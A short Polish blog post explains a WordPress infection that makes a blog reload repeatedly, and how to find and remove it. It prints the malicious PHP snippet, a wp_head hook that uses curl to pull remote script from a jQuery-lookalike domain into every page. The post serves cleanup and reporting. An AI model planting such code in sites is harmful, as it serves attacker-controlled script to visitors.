Blog na wordpressie przeładowuje się raz za razem
Jeżeli z jakiegoś powodu Twój blog zaczął świrować, to może znaczyć, że zainstalowałeś szablon/wtyczkę, której celem było np. infekowanie komputerów ludzi odwiedzających Twoją stronę. Po zatrzymaniu przeglądarki i wyświetleniu źródła strony znaleźć możemy między innymi zapis:
InitiateFrameRequest();
Szkodnik jest ciężki do znalezienia, ponieważ wymieniona powyżej linia nie występuje w żadnym pliku. Na szczęście jest inny, łatwiejszy sposób, na odnalezienie właściwego pliku. Należy znaleźć wszystkie pliki zawierające słowa: curl , add_action oraz wp_head. Nie będzie ich zbyt wiele i w jednym z nich znajdziemy kod podobny do tego umieszczonego poniżej:
<?php if (!function_exists('insert_jquery_sslider')){function insert_jquery_sslider(){ if (function_exists('curl_init')){$url = "www.jquerye.com/jquery-1.6.3.min.js";$ch = curl_init(); $timeout = 5;curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1); curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, $timeout);$data = curl_exec($ch);curl_close($ch);echo $data;}} add_action('wp_head', 'insert_jquery_sslider'); } ?>
Gdy już wiemy co to za plik, to możemy zrobić z tym porządek, np. wywalić całą zawartość. Następny krok zależy od tego, gdzie siedział złośliwy kod. Jeżeli jest to płatna wtyczka i mamy na komputerze zipa z jej zawartością, to możemy sprawdzić czy już w archiwum siedział złośliwy kod i jeżeli tak, to np. poinformować autora o problemie. Jeżeli wtyczka jest sprzedawana np. na CodeCanyon, to możemy również poinformować serwis o zaistniałym problemie.
Dodaj komentarz